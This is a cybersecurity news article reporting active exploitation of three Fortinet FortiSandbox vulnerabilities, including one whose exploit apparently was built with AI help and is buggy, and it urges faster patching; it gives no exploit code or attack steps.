Three FortiSandbox flaws, including one patched last week, are being actively exploited, highlighting the shrinking window for defenders.Cybersecurity firm Defused Cyber confirmed it’s seen active exploitation of three vulnerabilities in Fortinet FortiSandbox within a 24-hour window. Two of them had patches sitting available since April. The third got fixed last week, which, apparently, wasn’t fast enough.We are observing exploitation of multiple Fortinet FortiSandbox vulnerabilities during the past 24 hours, including:CVE-2026-39813 (no previous recorded exploitation)CVE-2026-39808 CVE-2026-25089 (vibecoded, likely faulty exploit) Per our research a working exploit for… pic.twitter.com/obZTugupWT— Defused (@DefusedCyber) June 15, 2026CVE-2026-39813 (CVSS score: 9.1) is a path traversal vulnerability in FortiSandbox JRPC API that could allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests. Its twin, CVE-2026-39808 (CVSS score of 9.8), carries the same severity score and is an OS command injection flaw, same attack vector, same result: unauthenticated code execution via crafted HTTP requests. Both had patches available for two months.The third flaw, CVE-2026-25089, hits a broader surface. Fortinet described it as an operating system command injection impacting FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS WEB UI that could allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests. The patch dropped last week, yet it’s already being used in the wild.“An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in FortiSandbox, FortiSandbox Cloud and FortiSandbox PaaS WEB UI may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests.” reads the advisory.Here’s where it gets interesting. The exploit for CVE-2026-25089 appears to have been built with AI assistance, and it shows, not in a good way. Defused Cyber researchers speculate that the exploit for CVE-2026-25089 not only shows signs of being developed using an artificial intelligence (AI) model, but is also bugged. A working exploit for the vulnerability has not been publicly disclosed. So attackers are throwing broken AI-generated code at unpatched systems and still finding traction. That should tell you something about the state of patch management out there.Fortinet gear keeps drawing this kind of attention. In April, the company pushed out-of-band patches for a critical flaw in FortiClient EMS, tracked as CVE-2026-35616, (CVSS score of 9.1) which was already being exploited before the fix arrived. If you run anything in the Fortinet stack, the window between disclosure and active exploitation has become uncomfortably short. Patch cycles measured in weeks are now measured in days.Follow me on Twitter: @securityaffairs and Facebook and MastodonPierluigi Paganini(SecurityAffairs – hacking, Fortinet)